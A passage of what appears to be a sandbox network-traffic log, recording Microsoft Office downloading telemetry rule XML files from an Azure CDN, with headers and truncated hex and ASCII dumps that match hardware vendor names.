                                                                                                        2024-12-09 12:49:37 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        18192.168.2.84973913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:36 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:37 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:36 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 486
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                        ETag: "0x8DC582BB344914B"
                                                                                                        x-ms-request-id: 15aef412-b01e-0070-4ab4-491cc0000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124936Z-r1cf579d778pftsbhC1EWRa0gn00000002z0000000003at8
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:37 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        19192.168.2.84974113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:36 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:38 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:38 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 486
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                        ETag: "0x8DC582B9018290B"
                                                                                                        x-ms-request-id: 3861519e-b01e-001e-7e3f-490214000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124938Z-r1cf579d778w7n65hC1EWR9b6800000000xg0000000026w6
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:38 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        20192.168.2.84974513.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:38 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:39 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:39 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 415
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                                        x-ms-request-id: 8fefdd67-e01e-0071-614a-4908e7000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124939Z-r1cf579d7782v2q5hC1EWRt9bw000000035g000000003cmh
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:39 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        21192.168.2.84974413.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:38 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:39 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:39 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 469
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                        ETag: "0x8DC582BBA701121"
                                                                                                        x-ms-request-id: 3bfd724e-501e-0016-6705-48181b000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124939Z-r1cf579d778qgtz2hC1EWRmgks0000000880000000003pf7
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:39 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        22192.168.2.84974613.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:38 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:39 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:38 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 477
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                                        x-ms-request-id: fff301c7-601e-0097-4606-48f33a000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124938Z-r1cf579d7789trgthC1EWRkkfc00000008z0000000007u2h
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:39 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        23192.168.2.84974713.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:38 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:39 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:39 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 464
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                                        x-ms-request-id: b89b3fcb-001e-0065-4ece-490b73000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124939Z-r1cf579d778gg9hlhC1EWRh7nw000000012g000000000zhp
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:39 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        24192.168.2.84974813.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:40 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:40 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:40 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 494
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                                        x-ms-request-id: d23be26f-101e-0046-5e0d-4991b0000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124940Z-r1cf579d778l2x6lhC1EWRsptc000000017g000000008fn0
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:40 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        25192.168.2.84975013.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:40 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:41 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:41 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 472
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                                        x-ms-request-id: f6d2a488-401e-000a-7403-484a7b000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124941Z-r1cf579d778qlpkrhC1EWRpfc80000000930000000003ymr
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:41 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        26192.168.2.84975113.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:40 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:41 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:41 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 404
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                                        x-ms-request-id: 987987f9-101e-0034-0e02-4896ff000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124941Z-r1cf579d778t5c2lhC1EWRce3w0000000940000000002r5q
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:41 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        27192.168.2.84975213.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:40 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                        Host: otelrules.azureedge.net
                                                                                                        2024-12-09 12:49:41 UTC470INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 09 Dec 2024 12:49:41 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 468
                                                                                                        Connection: close
                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                                        x-ms-request-id: 7ebc7efb-d01e-00ad-787a-49e942000000
                                                                                                        x-ms-version: 2018-03-28
                                                                                                        x-azure-ref: 20241209T124941Z-r1cf579d778w7n65hC1EWR9b6800000000vg000000004pst
                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                        X-Cache: TCP_HIT
                                                                                                        Accept-Ranges: bytes
                                                                                                        2024-12-09 12:49:41 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                        28192.168.2.84974913.107.246.63443
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-09 12:49:40 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Accept-Encoding: gzip
